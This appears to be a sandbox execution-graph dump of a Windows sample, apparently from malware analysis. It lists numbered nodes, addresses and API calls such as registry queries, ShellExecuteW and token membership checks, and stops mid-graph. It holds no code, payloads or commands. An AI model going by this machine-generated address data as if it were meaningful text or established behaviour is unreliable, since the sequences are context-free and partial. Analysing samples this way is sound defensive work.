              Total number of Nodes:2000
              Total number of Limit Nodes:163
              execution_graph 98359 1402410 98373 1400000 98359->98373 98361 1402511 98376 1402300 98361->98376 98379 1403540 GetPEB 98373->98379 98375 140068b 98375->98361 98377 1402309 Sleep 98376->98377 98378 1402317 98377->98378 98380 140356a 98379->98380 98380->98375 98381 18568a 98388 185c18 98381->98388 98386 1856ba Mailbox 98400 1a0ff6 98388->98400 98390 185c2b 98391 1a0ff6 Mailbox 59 API calls 98390->98391 98392 18569c 98391->98392 98393 185632 98392->98393 98438 185a2f 98393->98438 98396 185643 98398 185674 98396->98398 98445 185d20 98396->98445 98451 185bda 98396->98451 98398->98386 98399 1881c1 61 API calls Mailbox 98398->98399 98399->98386 98403 1a0ffe 98400->98403 98402 1a1018 98402->98390 98403->98402 98405 1a101c std::exception::exception 98403->98405 98410 1a594c 98403->98410 98427 1a35e1 DecodePointer 98403->98427 98428 1a87db RaiseException 98405->98428 98407 1a1046 98429 1a8711 58 API calls _free 98407->98429 98409 1a1058 98409->98390 98411 1a59c7 98410->98411 98415 1a5958 98410->98415 98436 1a35e1 DecodePointer 98411->98436 98413 1a59cd 98437 1a8d68 58 API calls __getptd_noexit 98413->98437 98414 1a5963 98414->98415 98430 1aa3ab 58 API calls 2 library calls 98414->98430 98431 1aa408 58 API calls 8 library calls 98414->98431 98432 1a32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98414->98432 98415->98414 98418 1a598b RtlAllocateHeap 98415->98418 98421 1a59b3 98415->98421 98425 1a59b1 98415->98425 98433 1a35e1 DecodePointer 98415->98433 98418->98415 98419 1a59bf 98418->98419 98419->98403 98434 1a8d68 58 API calls __getptd_noexit 98421->98434 98435 1a8d68 58 API calls __getptd_noexit 98425->98435 98427->98403 98428->98407 98429->98409 98430->98414 98431->98414 98433->98415 98434->98425 98435->98419 98436->98413 98437->98419 98439 185a40 98438->98439 98440 1be065 98438->98440 98439->98396 98460 1d6443 59 API calls Mailbox 98440->98460 98442 1be06f 98443 1a0ff6 Mailbox 59 API calls 98442->98443 98444 1be07b 98443->98444 98446 185d2e 98445->98446 98447 185d93 98445->98447 98448 185d56 98446->98448 98450 185d66 ReadFile 98446->98450 98461 185dae SetFilePointerEx 98447->98461 98448->98396 98450->98446 98450->98448 98452 185bee 98451->98452 98453 1be117 98451->98453 98462 185b19 98452->98462 98467 1d6443 59 API calls Mailbox 98453->98467 98456 185bfa 98456->98396 98457 1be122 98458 1a0ff6 Mailbox 59 API calls 98457->98458 98459 1be137 _memmove 98458->98459 98460->98442 98461->98446 98463 185b31 98462->98463 98466 185b2a _memmove 98462->98466 98464 1be0a7 98463->98464 98465 1a0ff6 Mailbox 59 API calls 98463->98465 98465->98466 98466->98456 98467->98457 98468 18e70b 98471 18d260 98468->98471 98470 18e719 98472 18d27d 98471->98472 98500 18d4dd 98471->98500 98473 1c2b0a 98472->98473 98474 1c2abb 98472->98474 98504 18d2a4 98472->98504 98545 1fa6fb 341 API calls __cinit 98473->98545 98477 1c2abe 98474->98477 98479 1c2ad9 98474->98479 98478 1c2aca 98477->98478 98477->98504 98543 1fad0f 341 API calls 98478->98543 98479->98500 98544 1fb1b7 341 API calls 3 library calls 98479->98544 98483 18d594 98534 188bb2 68 API calls 98483->98534 98484 1c2cdf 98484->98484 98485 18d6ab 98485->98470 98489 18d5a3 98489->98470 98490 1c2c26 98553 1faa66 89 API calls 98490->98553 98500->98485 98554 1ea0b5 89 API calls 4 library calls 98500->98554 98504->98483 98504->98485 98504->98490 98504->98500 98505 18a000 98504->98505 98528 1888a0 68 API calls __cinit 98504->98528 98529 1886a2 68 API calls 98504->98529 98530 188620 98504->98530 98535 18859a 68 API calls 98504->98535 98536 18d0dc 341 API calls 98504->98536 98537 189f3a 59 API calls Mailbox 98504->98537 98538 1a2f80 98504->98538 98541 18d060 89 API calls 98504->98541 98542 18cedd 341 API calls 98504->98542 98546 188bb2 68 API calls 98504->98546 98547 189e9c 60 API calls Mailbox 98504->98547 98548 1d6d03 60 API calls 98504->98548 98549 1881a7 98504->98549 98506 18a01f 98505->98506 98523 18a04d Mailbox 98505->98523 98507 1a0ff6 Mailbox 59 API calls 98506->98507 98507->98523 98508 18b5d5 98509 1881a7 59 API calls 98508->98509 98520 18a1b7 98509->98520 98510 1877c7 59 API calls 98510->98523 98511 1a0ff6 59 API calls Mailbox 98511->98523 98515 1c047f 98557 1ea0b5 89 API calls 4 library calls 98515->98557 98517 1881a7 59 API calls 98517->98523 98519 1c048e 98519->98504 98520->98504 98521 1a2f80 67 API calls __cinit 98521->98523 98522 1d7405 59 API calls 98522->98523 98523->98508 98523->98510 98523->98511 98523->98515 98523->98517 98523->98520 98523->98521 98523->98522 98524 1c0e00 98523->98524 98526 18a6ba 98523->98526 98527 18b5da 98523->98527 98555 18ca20 341 API calls 2 library calls 98523->98555 98556 18ba60 60 API calls Mailbox 98523->98556 98559 1ea0b5 89 API calls 4 library calls 98524->98559 98558 1ea0b5 89 API calls 4 library calls 98526->98558 98560 1ea0b5 89 API calls 4 library calls 98527->98560 98528->98504 98529->98504 98531 18862b 98530->98531 98533 188652 98531->98533 98561 188b13 69 API calls Mailbox 98531->98561 98533->98504 98534->98489 98535->98504 98536->98504 98537->98504 98562 1a2e84 98538->98562 98540 1a2f8b 98540->98504 98541->98504 98542->98504 98543->98485 98544->98500 98545->98504 98546->98504 98547->98504 98548->98504 98550 1881ba 98549->98550 98551 1881b2 98549->98551 98550->98504 98640 1880d7 59 API calls 2 library calls 98551->98640 98553->98500 98554->98484 98555->98523 98556->98523 98557->98519 98558->98520 98559->98527 98560->98520 98561->98533 98563 1a2e90 _doexit 98562->98563 98570 1a3457 98563->98570 98569 1a2eb7 _doexit 98569->98540 98587 1a9e4b 98570->98587 98572 1a2e99 98573 1a2ec8 DecodePointer DecodePointer 98572->98573 98574 1a2ea5 98573->98574 98575 1a2ef5 98573->98575 98584 1a2ec2 98574->98584 98575->98574 98633 1a89e4 59 API calls ___strgtold12_l 98575->98633 98577 1a2f58 EncodePointer EncodePointer 98577->98574 98578 1a2f2c 98578->98574 98582 1a2f46 EncodePointer 98578->98582 98635 1a8aa4 61 API calls 2 library calls 98578->98635 98579 1a2f07 98579->98577 98579->98578 98634 1a8aa4 61 API calls 2 library calls 98579->98634 98582->98577 98583 1a2f40 98583->98574 98583->98582 98636 1a3460 98584->98636 98588 1a9e6f EnterCriticalSection 98587->98588 98589 1a9e5c 98587->98589 98588->98572 98594 1a9ed3 98589->98594 98591 1a9e62 98591->98588 98618 1a32f5 58 API calls 3 library calls 98591->98618 98595 1a9edf _doexit 98594->98595 98596 1a9ee8 98595->98596 98597 1a9f00 98595->98597 98619 1aa3ab 58 API calls 2 library calls 98596->98619 98606 1a9f21 _doexit 98597->98606 98622 1a8a5d 58 API calls 2 library calls 98597->98622 98599 1a9eed 98620 1aa408 58 API calls 8 library calls 98599->98620 98602 1a9f15 98604 1a9f2b 98602->98604 98605 1a9f1c 98602->98605 98603 1a9ef4 98621 1a32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98603->98621 98607 1a9e4b __lock 58 API calls 98604->98607 98623 1a8d68 58 API calls __getptd_noexit 98605->98623 98606->98591 98610 1a9f32 98607->98610 98612 1a9f3f 98610->98612 98613 1a9f57 98610->98613 98624 1aa06b InitializeCriticalSectionAndSpinCount 98612->98624 98625 1a2f95 98613->98625 98616 1a9f4b 98631 1a9f73 LeaveCriticalSection _doexit 98616->98631 98619->98599 98620->98603 98622->98602 98623->98606 98624->98616 98626 1a2f9e RtlFreeHeap 98625->98626 98630 1a2fc7 __dosmaperr 98625->98630 98627 1a2fb3 98626->98627 98626->98630 98632 1a8d68 58 API calls __getptd_noexit 98627->98632 98629 1a2fb9 GetLastError 98629->98630 98630->98616 98631->98606 98632->98629 98633->98579 98634->98578 98635->98583 98639 1a9fb5 LeaveCriticalSection 98636->98639 98638 1a2ec7 98638->98569 98639->98638 98640->98550 98641 18107d 98646 1871eb 98641->98646 98643 18108c 98644 1a2f80 __cinit 67 API calls 98643->98644 98645 181096 98644->98645 98647 1871fb __ftell_nolock 98646->98647 98677 1877c7 98647->98677 98651 1872ba 98689 1a074f 98651->98689 98658 1877c7 59 API calls 98659 1872eb 98658->98659 98708 187eec 98659->98708 98661 1872f4 RegOpenKeyExW 98662 1becda RegQueryValueExW 98661->98662 98666 187316 Mailbox 98661->98666 98663 1bed6c RegCloseKey 98662->98663 98664 1becf7 98662->98664 98663->98666 98676 1bed7e _wcscat Mailbox __wsetenvp 98663->98676 98665 1a0ff6 Mailbox 59 API calls 98664->98665 98667 1bed10 98665->98667 98666->98643 98712 18538e 98667->98712 98668 187b52 59 API calls 98668->98676 98671 1bed38 98715 187d2c 98671->98715 98673 1bed52 98673->98663 98675 183f84 59 API calls 98675->98676 98676->98666 98676->98668 98676->98675 98724 187f41 98676->98724 98678 1a0ff6 Mailbox 59 API calls 98677->98678 98679 1877e8 98678->98679 98680 1a0ff6 Mailbox 59 API calls 98679->98680 98681 1872b1 98680->98681 98682 184864 98681->98682 98728 1b1b90 98682->98728 98685 187f41 59 API calls 98686 184897 98685->98686 98730 1848ae 98686->98730 98688 1848a1 Mailbox 98688->98651 98690 1b1b90 __ftell_nolock 98689->98690 98691 1a075c GetFullPathNameW 98690->98691 98692 1a077e 98691->98692 98693 187d2c 59 API calls 98692->98693 98694 1872c5 98693->98694 98695 187e0b 98694->98695 98696 187e1f 98695->98696 98697 1bf173 98695->98697 98752 187db0 98696->98752 98757 188189 98697->98757 98700 1872d3 98702 183f84 98700->98702 98701 1bf17e __wsetenvp _memmove 98704 183f92 98702->98704 98707 183fb4 _memmove 98702->98707 98703 1a0ff6 Mailbox 59 API calls 98705 183fc8 98703->98705 98706 1a0ff6 Mailbox 59 API calls 98704->98706 98705->98658 98706->98707 98707->98703 98709 187f06 98708->98709 98711 187ef9 98708->98711 98710 1a0ff6 Mailbox 59 API calls 98709->98710 98710->98711 98711->98661 98713 1a0ff6 Mailbox 59 API calls 98712->98713 98714 1853a0 RegQueryValueExW 98713->98714 98714->98671 98714->98673 98716 187d38 __wsetenvp 98715->98716 98717 187da5 98715->98717 98719 187d4e 98716->98719 98720 187d73 98716->98720 98718 187e8c 59 API calls 98717->98718 98723 187d56 _memmove 98718->98723 98760 188087 59 API calls Mailbox 98719->98760 98722 188189 59 API calls 98720->98722 98722->98723 98723->98673 98725 187f50 __wsetenvp _memmove 98724->98725 98726 1a0ff6 Mailbox 59 API calls 98725->98726 98727 187f8e 98726->98727 98727->98676 98729 184871 GetModuleFileNameW 98728->98729 98729->98685 98731 1b1b90 __ftell_nolock 98730->98731 98732 1848bb GetFullPathNameW 98731->98732 98733 1848da 98732->98733 98734 1848f7 98732->98734 98735 187d2c 59 API calls 98733->98735 98736 187eec 59 API calls 98734->98736 98737 1848e6 98735->98737 98736->98737 98740 187886 98737->98740 98741 187894 98740->98741 98744 187e8c 98741->98744 98743 1848f2 98743->98688 98745 187e9a 98744->98745 98746 187ea3 _memmove 98744->98746 98745->98746 98748 187faf 98745->98748 98746->98743 98749 187fc2 98748->98749 98751 187fbf _memmove 98748->98751 98750 1a0ff6 Mailbox 59 API calls 98749->98750 98750->98751 98751->98746 98753 187dbf __wsetenvp 98752->98753 98754 188189 59 API calls 98753->98754 98755 187dd0 _memmove 98753->98755 98756 1bf130 _memmove 98754->98756 98755->98700 98758 1a0ff6 Mailbox 59 API calls 98757->98758 98759 188193 98758->98759 98759->98701 98760->98723 98761 1a7e93 98762 1a7e9f _doexit 98761->98762 98798 1aa048 GetStartupInfoW 98762->98798 98764 1a7ea4 98800 1a8dbc GetProcessHeap 98764->98800 98766 1a7efc 98767 1a7f07 98766->98767 98883 1a7fe3 58 API calls 3 library calls 98766->98883 98801 1a9d26 98767->98801 98770 1a7f0d 98771 1a7f18 __RTC_Initialize 98770->98771 98884 1a7fe3 58 API calls 3 library calls 98770->98884 98822 1ad812 98771->98822 98774 1a7f27 98775 1a7f33 GetCommandLineW 98774->98775 98885 1a7fe3 58 API calls 3 library calls 98774->98885 98841 1b5173 GetEnvironmentStringsW 98775->98841 98778 1a7f32 98778->98775 98781 1a7f4d 98782 1a7f58 98781->98782 98886 1a32f5 58 API calls 3 library calls 98781->98886 98851 1b4fa8 98782->98851 98785 1a7f5e 98786 1a7f69 98785->98786 98887 1a32f5 58 API calls 3 library calls 98785->98887 98865 1a332f 98786->98865 98789 1a7f71 98790 1a7f7c __wwincmdln 98789->98790 98888 1a32f5 58 API calls 3 library calls 98789->98888 98871 18492e 98790->98871 98793 1a7f90 98794 1a7f9f 98793->98794 98889 1a3598 58 API calls _doexit 98793->98889 98890 1a3320 58 API calls _doexit 98794->98890 98797 1a7fa4 _doexit 98799 1aa05e 98798->98799 98799->98764 98800->98766 98891 1a33c7 36 API calls 2 library calls 98801->98891 98803 1a9d2b 98892 1a9f7c InitializeCriticalSectionAndSpinCount __mtinitlocks 98803->98892 98805 1a9d30 98806 1a9d34 98805->98806 98894 1a9fca TlsAlloc 98805->98894 98893 1a9d9c 61 API calls 2 library calls 98806->98893 98809 1a9d46 98809->98806 98811 1a9d51 98809->98811 98810 1a9d39 98810->98770 98895 1a8a15 98811->98895 98814 1a9d93 98903 1a9d9c 61 API calls 2 library calls 98814->98903 98817 1a9d72 98817->98814 98819 1a9d78 98817->98819 98818 1a9d98 98818->98770 98902 1a9c73 58 API calls 4 library calls 98819->98902 98821 1a9d80 GetCurrentThreadId 98821->98770 98823 1ad81e _doexit 98822->98823 98824 1a9e4b __lock 58 API calls 98823->98824 98825 1ad825 98824->98825 98826 1a8a15 __calloc_crt 58 API calls 98825->98826 98827 1ad836 98826->98827 98828 1ad841 _doexit @_EH4_CallFilterFunc@8 98827->98828 98829 1ad8a1 GetStartupInfoW 98827->98829 98828->98774 98830 1ad8b6 98829->98830 98831 1ad9e5 98829->98831 98830->98831 98834 1a8a15 __calloc_crt 58 API calls 98830->98834 98838 1ad904 98830->98838 98832 1adaad 98831->98832 98835 1ada32 GetStdHandle 98831->98835 98836 1ada45 GetFileType 98831->98836 98916 1aa06b InitializeCriticalSectionAndSpinCount 98831->98916 98917 1adabd LeaveCriticalSection _doexit 98832->98917 98834->98830 98835->98831 98836->98831 98837 1ad938 GetFileType 98837->98838 98838->98831 98838->98837 98915 1aa06b InitializeCriticalSectionAndSpinCount 98838->98915 98842 1a7f43 98841->98842 98843 1b5184 98841->98843 98847 1b4d6b GetModuleFileNameW 98842->98847 98918 1a8a5d 58 API calls 2 library calls 98843->98918 98845 1b51aa _memmove 98846 1b51c0 FreeEnvironmentStringsW 98845->98846 98846->98842 98848 1b4d9f _wparse_cmdline 98847->98848 98850 1b4ddf _wparse_cmdline 98848->98850 98919 1a8a5d 58 API calls 2 library calls 98848->98919 98850->98781 98852 1b4fc1 __wsetenvp 98851->98852 98856 1b4fb9 98851->98856 98853 1a8a15 __calloc_crt 58 API calls 98852->98853 98861 1b4fea __wsetenvp 98853->98861 98854 1b5041 98855 1a2f95 _free 58 API calls 98854->98855 98855->98856 98856->98785 98857 1a8a15 __calloc_crt 58 API calls 98857->98861 98858 1b5066 98859 1a2f95 _free 58 API calls 98858->98859 98859->98856 98861->98854 98861->98856 98861->98857 98861->98858 98862 1b507d 98861->98862 98920 1b4857 58 API calls ___strgtold12_l 98861->98920 98921 1a9006 IsProcessorFeaturePresent 98862->98921 98864 1b5089 98864->98785 98867 1a333b __IsNonwritableInCurrentImage 98865->98867 98944 1aa711 98867->98944 98868 1a3359 __initterm_e 98869 1a2f80 __cinit 67 API calls 98868->98869 98870 1a3378 _doexit __IsNonwritableInCurrentImage 98868->98870 98869->98870 98870->98789 98872 184948 98871->98872 98882 1849e7 98871->98882 98873 184982 IsThemeActive 98872->98873 98947 1a35ac 98873->98947 98877 1849ae 98959 184a5b SystemParametersInfoW SystemParametersInfoW 98877->98959 98879 1849ba 98960 183b4c 98879->98960 98881 1849c2 SystemParametersInfoW 98881->98882 98882->98793 98883->98767 98884->98771 98885->98778 98889->98794 98890->98797 98891->98803 98892->98805 98893->98810 98894->98809 98897 1a8a1c 98895->98897 98898 1a8a57 98897->98898 98900 1a8a3a 98897->98900 98904 1b5446 98897->98904 98898->98814 98901 1aa026 TlsSetValue 98898->98901 98900->98897 98900->98898 98912 1aa372 Sleep 98900->98912 98901->98817 98902->98821 98903->98818 98905 1b5451 98904->98905 98910 1b546c 98904->98910 98906 1b545d 98905->98906 98905->98910 98913 1a8d68 58 API calls __getptd_noexit 98906->98913 98908 1b547c HeapAlloc 98909 1b5462 98908->98909 98908->98910 98909->98897 98910->98908 98910->98909 98914 1a35e1 DecodePointer 98910->98914 98912->98900 98913->98909 98914->98910 98915->98838 98916->98831 98917->98828 98918->98845 98919->98850 98920->98861 98922 1a9011 98921->98922 98927 1a8e99 98922->98927 98926 1a902c 98926->98864 98928 1a8eb3 _memset __call_reportfault 98927->98928 98929 1a8ed3 IsDebuggerPresent 98928->98929 98935 1aa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98929->98935 98932 1a8f97 __call_reportfault 98936 1ac836 98932->98936 98933 1a8fba 98934 1aa380 GetCurrentProcess TerminateProcess 98933->98934 98934->98926 98935->98932 98937 1ac83e 98936->98937 98938 1ac840 IsProcessorFeaturePresent 98936->98938 98937->98933 98940 1b5b5a 98938->98940 98943 1b5b09 5 API calls 2 library calls 98940->98943 98942 1b5c3d 98942->98933 98943->98942 98945 1aa714 EncodePointer 98944->98945 98945->98945 98946 1aa72e 98945->98946 98946->98868 98948 1a9e4b __lock 58 API calls 98947->98948 98949 1a35b7 DecodePointer EncodePointer 98948->98949 99012 1a9fb5 LeaveCriticalSection 98949->99012 98951 1849a7 98952 1a3614 98951->98952 98953 1a3638 98952->98953 98954 1a361e 98952->98954 98953->98877 98954->98953 99013 1a8d68 58 API calls __getptd_noexit 98954->99013 98956 1a3628 99014 1a8ff6 9 API calls ___strgtold12_l 98956->99014 98958 1a3633 98958->98877 98959->98879 98961 183b59 __ftell_nolock 98960->98961 98962 1877c7 59 API calls 98961->98962 98963 183b63 GetCurrentDirectoryW 98962->98963 99015 183778 98963->99015 98965 183b8c IsDebuggerPresent 98966 183b9a 98965->98966 98967 1bd4ad MessageBoxA 98965->98967 98968 183c73 98966->98968 98970 1bd4c7 98966->98970 98971 183bb7 98966->98971 98967->98970 98969 183c7a SetCurrentDirectoryW 98968->98969 98974 183c87 Mailbox 98969->98974 99225 187373 59 API calls Mailbox 98970->99225 99096 1873e5 98971->99096 98974->98881 98975 1bd4d7 98980 1bd4ed SetCurrentDirectoryW 98975->98980 98977 183bd5 GetFullPathNameW 98978 187d2c 59 API calls 98977->98978 98979 183c10 98978->98979 99112 190a8d 98979->99112 98980->98974 98983 183c2e 98984 183c38 98983->98984 99226 1e4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98983->99226 99128 183a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98984->99128 98988 1bd50a 98988->98984 98990 1bd51b 98988->98990 98992 184864 61 API calls 98990->98992 98991 183c42 98993 183c55 98991->98993 99136 1843db 98991->99136 98994 1bd523 98992->98994 99147 190b30 98993->99147 98997 187f41 59 API calls 98994->98997 98999 1bd530 98997->98999 99000 1bd53a 98999->99000 99001 1bd55f 98999->99001 99003 187e0b 59 API calls 99000->99003 99004 187e0b 59 API calls 99001->99004 99005 1bd545 99003->99005 99006 1bd55b GetForegroundWindow ShellExecuteW 99004->99006 99227 187c8e 99005->99227 99009 1bd58f Mailbox 99006->99009 99009->98968 99012->98951 99013->98956 99014->98958 99016 1877c7 59 API calls 99015->99016 99017 18378e 99016->99017 99236 183d43 99017->99236 99019 1837ac 99020 184864 61 API calls 99019->99020 99021 1837c0 99020->99021 99022 187f41 59 API calls 99021->99022 99023 1837cd 99022->99023 99250 184f3d 99023->99250 99026 1bd3ae 99313 1e97e5 99026->99313 99027 1837ee Mailbox 99031 1881a7 59 API calls 99027->99031 99030 1bd3cd 99033 1a2f95 _free 58 API calls 99030->99033 99034 183801 99031->99034 99036 1bd3da 99033->99036 99274 1893ea 99034->99274 99037 184faa 84 API calls 99036->99037 99039 1bd3e3 99037->99039 99043 183ee2 59 API calls 99039->99043 99040 187f41 59 API calls 99041 18381a 99040->99041 99042 188620 69 API calls 99041->99042 99044 18382c Mailbox 99042->99044 99045 1bd3fe 99043->99045 99046 187f41 59 API calls 99044->99046 99047 183ee2 59 API calls 99045->99047 99048 183852 99046->99048 99049 1bd41a 99047->99049 99050 188620 69 API calls 99048->99050 99051 184864 61 API calls 99049->99051 99053 183861 Mailbox 99050->99053 99052 1bd43f 99051->99052 99054 183ee2 59 API calls 99052->99054 99055 1877c7 59 API calls 99053->99055 99056 1bd44b 99054->99056 99058 18387f 99055->99058 99057 1881a7 59 API calls 99056->99057 99059 1bd459 99057->99059 99277 183ee2 99058->99277 99061 183ee2 59 API calls 99059->99061 99063 1bd468 99061->99063 99069 1881a7 59 API calls 99063->99069 99065 183899 99065->99039 99066 1838a3 99065->99066 99067 1a313d _W_store_winword 60 API calls 99066->99067 99068 1838ae 99067->99068 99068->99045 99070 1838b8 99068->99070 99071 1bd48a 99069->99071 99072 1a313d _W_store_winword 60 API calls 99070->99072 99073 183ee2 59 API calls 99071->99073 99074 1838c3 99072->99074 99075 1bd497 99073->99075 99074->99049 99076 1838cd 99074->99076 99075->99075 99077 1a313d _W_store_winword 60 API calls 99076->99077 99078 1838d8 99077->99078 99078->99063 99079 183919 99078->99079 99081 183ee2 59 API calls 99078->99081 99079->99063 99080 183926 99079->99080 99293 18942e 99080->99293 99082 1838fc 99081->99082 99084 1881a7 59 API calls 99082->99084 99086 18390a 99084->99086 99088 183ee2 59 API calls 99086->99088 99088->99079 99091 1893ea 59 API calls 99093 183961 99091->99093 99092 189040 60 API calls 99092->99093 99093->99091 99093->99092 99094 183ee2 59 API calls 99093->99094 99095 1839a7 Mailbox 99093->99095 99094->99093 99095->98965 99097 1873f2 __ftell_nolock 99096->99097 99098 1bee4b _memset 99097->99098 99099 18740b 99097->99099 99101 1bee67 GetOpenFileNameW 99098->99101 99100 1848ae 60 API calls 99099->99100 99102 187414 99100->99102 99103 1beeb6 99101->99103 100093 1a09d5 99102->100093 99105 187d2c 59 API calls 99103->99105 99107 1beecb 99105->99107 99107->99107 99109 187429 100111 1869ca 99109->100111 99113 190a9a __ftell_nolock 99112->99113 100406 186ee0 99113->100406 99115 190a9f 99127 183c26 99115->99127 100417 1912fe 89 API calls 99115->100417 99117 190aac 99117->99127 100418 194047 91 API calls Mailbox 99117->100418 99119 190ab5 99120 190ab9 GetFullPathNameW 99119->99120 99119->99127 99121 187d2c 59 API calls 99120->99121 99122 190ae5 99121->99122 99123 187d2c 59 API calls 99122->99123 99124 190af2 99123->99124 99125 187d2c 59 API calls 99124->99125 99126 1c50d5 _wcscat 99124->99126 99125->99127 99127->98975 99127->98983 99129 1bd49c 99128->99129 99130 183ac2 LoadImageW RegisterClassExW 99128->99130 100462 1848fe LoadImageW EnumResourceNamesW 99129->100462 100461 183041 7 API calls 99130->100461 99133 183b46 99135 1839e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99133->99135 99134 1bd4a5 99135->98991 99137 184406 _memset 99136->99137 100463 184213 99137->100463 99140 18448b 99148 1c50ed 99147->99148 99162 190b55 99147->99162 100551 1ea0b5 89 API calls 4 library calls 99148->100551 99222 190b65 Mailbox 99162->99222 100552 189fbd 60 API calls 99162->100552 100553 1d68bf 341 API calls 99162->100553 99201 18a000 314 API calls 99201->99222 99207 1910f5 99208 190fee Mailbox 99208->99207 99208->99222 99209 1ea0b5 89 API calls 99209->99222 99210 188620 69 API calls 99210->99222 99212 188b13 69 API calls 99212->99222 99213 189df0 59 API calls Mailbox 99213->99222 99215 1d66f4 59 API calls Mailbox 99215->99222 99222->99201 99222->99207 99222->99208 99222->99209 99222->99210 99222->99212 99222->99213 99222->99215 99225->98975 99226->98988 99237 183d50 __ftell_nolock 99236->99237 99238 187d2c 59 API calls 99237->99238 99244 183eb6 Mailbox 99237->99244 99240 183d82 99238->99240 99249 183db8 Mailbox 99240->99249 99354 187b52 99240->99354 99241 187b52 59 API calls 99241->99249 99242 183e89 99243 187f41 59 API calls 99242->99243 99242->99244 99246 183eaa 99243->99246 99244->99019 99245 187f41 59 API calls 99245->99249 99247 183f84 59 API calls 99246->99247 99247->99244 99248 183f84 59 API calls 99248->99249 99249->99241 99249->99242 99249->99244 99249->99245 99249->99248 99357 184d13 99250->99357 99255 184f68 LoadLibraryExW 99367 184cc8 99255->99367 99256 1bdd0f 99258 184faa 84 API calls 99256->99258 99259 1bdd16 99258->99259 99261 184cc8 3 API calls 99259->99261 99263 1bdd1e 99261->99263 99393 18506b 99263->99393 99264 184f8f 99264->99263 99265 184f9b 99264->99265 99267 184faa 84 API calls 99265->99267 99269 1837e6 99267->99269 99269->99026 99269->99027 99271 1bdd45 99401 185027 99271->99401 99273 1bdd52 99275 1a0ff6 Mailbox 59 API calls 99274->99275 99276 18380d 99275->99276 99276->99040 99278 183eec 99277->99278 99279 183f05 99277->99279 99280 1881a7 59 API calls 99278->99280 99281 187d2c 59 API calls 99279->99281 99282 18388b 99280->99282 99281->99282 99283 1a313d 99282->99283 99284 1a3149 99283->99284 99285 1a31be 99283->99285 99292 1a316e 99284->99292 99828 1a8d68 58 API calls __getptd_noexit 99284->99828 99830 1a31d0 60 API calls 3 library calls 99285->99830 99288 1a31cb 99288->99065 99289 1a3155 99829 1a8ff6 9 API calls ___strgtold12_l 99289->99829 99291 1a3160 99291->99065 99292->99065 99294 189436 99293->99294 99295 1a0ff6 Mailbox 59 API calls 99294->99295 99296 189444 99295->99296 99297 183936 99296->99297 99831 18935c 59 API calls Mailbox 99296->99831 99299 1891b0 99297->99299 99832 1892c0 99299->99832 99301 1a0ff6 Mailbox 59 API calls 99303 183944 99301->99303 99302 1891bf 99302->99301 99302->99303 99304 189040 99303->99304 99305 1bf5a5 99304->99305 99312 189057 99304->99312 99305->99312 99842 188d3b 59 API calls Mailbox 99305->99842 99307 189158 99310 1a0ff6 Mailbox 59 API calls 99307->99310 99308 1891a0 99841 189e9c 60 API calls Mailbox 99308->99841 99311 18915f 99310->99311 99311->99093 99312->99307 99312->99308 99312->99311 99314 185045 85 API calls 99313->99314 99315 1e9854 99314->99315 99843 1e99be 99315->99843 99318 18506b 74 API calls 99319 1e9881 99318->99319 99320 18506b 74 API calls 99319->99320 99321 1e9891 99320->99321 99322 18506b 74 API calls 99321->99322 99323 1e98ac 99322->99323 99324 18506b 74 API calls 99323->99324 99325 1e98c7 99324->99325 99326 185045 85 API calls 99325->99326 99327 1e98de 99326->99327 99328 1a594c _W_store_winword 58 API calls 99327->99328 99329 1e98e5 99328->99329 99330 1a594c _W_store_winword 58 API calls 99329->99330 99331 1e98ef 99330->99331 99332 18506b 74 API calls 99331->99332 99333 1e9903 99332->99333 99334 1e9393 GetSystemTimeAsFileTime 99333->99334 99335 1e9916 99334->99335 99336 1e992b 99335->99336 99337 1e9940 99335->99337 99340 1a2f95 _free 58 API calls 99336->99340 99338 1e9946 99337->99338 99339 1e99a5 99337->99339 99849 1e8d90 99338->99849 99342 1a2f95 _free 58 API calls 99339->99342 99343 1e9931 99340->99343 99347 1bd3c1 99342->99347 99345 1a2f95 _free 58 API calls 99343->99345 99345->99347 99346 1a2f95 _free 58 API calls 99346->99347 99347->99030 99348 184faa 99347->99348 99349 184fbb 99348->99349 99350 184fb4 99348->99350 99352 184fca 99349->99352 99353 184fdb FreeLibrary 99349->99353 99351 1a55d6 __fcloseall 83 API calls 99350->99351 99351->99349 99352->99030 99353->99352 99355 187faf 59 API calls 99354->99355 99356 187b5d 99355->99356 99356->99240 99406 184d61 99357->99406 99360 184d3a 99361 184d4a FreeLibrary 99360->99361 99362 184d53 99360->99362 99361->99362 99364 1a548b 99362->99364 99363 184d61 2 API calls 99363->99360 99410 1a54a0 99364->99410 99366 184f5c 99366->99255 99366->99256 99568 184d94 99367->99568 99370 184ced 99371 184d08 99370->99371 99372 184cff FreeLibrary 99370->99372 99374 184dd0 99371->99374 99372->99371 99373 184d94 2 API calls 99373->99370 99375 1a0ff6 Mailbox 59 API calls 99374->99375 99376 184de5 99375->99376 99377 18538e 59 API calls 99376->99377 99378 184df1 _memmove 99377->99378 99379 184e2c 99378->99379 99381 184ee9 99378->99381 99382 184f21 99378->99382 99380 185027 69 API calls 99379->99380 99386 184e35 99380->99386 99572 184fe9 CreateStreamOnHGlobal 99381->99572 99583 1e9ba5 95 API calls 99382->99583 99385 18506b 74 API calls 99385->99386 99386->99385 99388 184ec9 99386->99388 99389 1bdcd0 99386->99389 99578 185045 99386->99578 99388->99264 99390 185045 85 API calls 99389->99390 99391 1bdce4 99390->99391 99392 18506b 74 API calls 99391->99392 99392->99388 99394 18507d 99393->99394 99395 1bddf6 99393->99395 99607 1a5812 99394->99607 99398 1e9393 99805 1e91e9 99398->99805 99400 1e93a9 99400->99271 99402 185036 99401->99402 99404 1bddb9 99401->99404 99810 1a5e90 99402->99810 99405 18503e 99405->99273 99407 184d2e 99406->99407 99408 184d6a LoadLibraryA 99406->99408 99407->99360 99407->99363 99408->99407 99409 184d7b GetProcAddress 99408->99409 99409->99407 99413 1a54ac _doexit 99410->99413 99411 1a54bf 99459 1a8d68 58 API calls __getptd_noexit 99411->99459 99413->99411 99415 1a54f0 99413->99415 99414 1a54c4 99460 1a8ff6 9 API calls ___strgtold12_l 99414->99460 99429 1b0738 99415->99429 99418 1a54f5 99419 1a550b 99418->99419 99420 1a54fe 99418->99420 99422 1a5535 99419->99422 99423 1a5515 99419->99423 99461 1a8d68 58 API calls __getptd_noexit 